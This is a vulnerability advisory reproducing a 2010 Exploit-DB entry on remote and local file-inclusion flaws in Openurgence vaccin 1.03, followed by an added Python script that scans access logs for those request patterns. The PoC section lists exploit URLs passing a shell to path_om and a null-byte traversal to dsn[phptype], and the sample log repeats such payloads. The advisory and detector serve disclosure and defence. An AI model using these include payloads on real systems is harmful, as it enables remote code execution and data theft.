Vendor: Openurgence vaccin
By: cr4wl3r
CVSS: 7.5 (HIGH)
Type: RFI/LFI
CWE: Not mentioned
Product Name: Openurgence vaccin
Affected Version From: 01.03
Affected Version To: 01.03
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Platforms Tested: Not mentioned

Openurgence vaccin 1.03 (RFI/LFI) Multiple File Include Vulnerability

Openurgence vaccin 1.03 contains multiple file inclusion vulnerabilities that remote or local attackers can exploit to include arbitrary files. This can lead to remote code execution, information disclosure, or denial of service.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch or update to a version that is not affected by this vulnerability. Additionally, it is advised to implement proper input validation and sanitization to prevent file inclusion attacks.

Exploit-DB raw data:

=====================================================================
Openurgence vaccin 1.03 (RFI/LFI) Multiple File Include Vulnerability
=====================================================================

[+] Discovered By: cr4wl3r
[+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, gcc.web.id

[+] Thanks to: str0ke, opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki, 
               EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom, 
               SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend

[+] PoC:

[~] RFI:
http://shell4u.tk/[path]/gen/obj/collectivite.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/injection.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/utilisateur.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/droit.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/laboratoire.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/vaccin.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/effetsecondaire.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/medecin.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/individu.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/profil.class.php?path_om=[Shell]

[~] LFI:
http://shell4u.tk/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]


# Inj3ct0r.com [2010-04-13]
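
For defenders, the request patterns listed in the PoC can be searched for in web-server access logs. The following is an added example, not part of the original advisory or of Openurgence vaccin: it flags requests that pass a URL or stream wrapper in `path_om` to a `gen/obj/*.class.php` script, or a traversal sequence or null byte in `dsn[phptype]` to `scr/soustab.php`. The log lines, addresses, host names and the `/openvaccin` install prefix are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# URL or stream-wrapper prefix in a parameter that should never carry one.
WRAPPER_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:)", re.I)


def classify(log_line):
    """Return 'RFI', 'LFI' or None for one access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    # parse_qsl percent-decodes names and values: %00 -> "\x00", %2F -> "/"
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == "path_om" and "/gen/obj/" in path and path.endswith(".class.php"):
            if WRAPPER_RE.match(value):
                return "RFI"
        if name == "dsn[phptype]" and path.endswith("/scr/soustab.php"):
            if "\x00" in value or ".." in value or value.startswith(("/", "\\")):
                return "LFI"
    return None


def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits


# Constructed sample log: documentation address ranges, .invalid host names.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Apr/2010:10:00:01 +0000] "GET /openvaccin/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Apr/2010:10:00:05 +0000] "GET /openvaccin/gen/obj/vaccin.class.php?path_om=http://files.example.invalid/a.txt? HTTP/1.1" 200 310',
    '198.51.100.7 - - [13/Apr/2010:10:00:09 +0000] "GET /openvaccin/scr/soustab.php?dsn%5Bphptype%5D=..%2F..%2Fsample%00 HTTP/1.1" 200 1420',
    '192.0.2.10 - - [13/Apr/2010:10:00:12 +0000] "GET /openvaccin/gen/obj/vaccin.class.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: possible {verdict} attempt")
```

Only the query string is inspected, so parameters sent in a POST body would need request-body logging or a WAF rule to be seen.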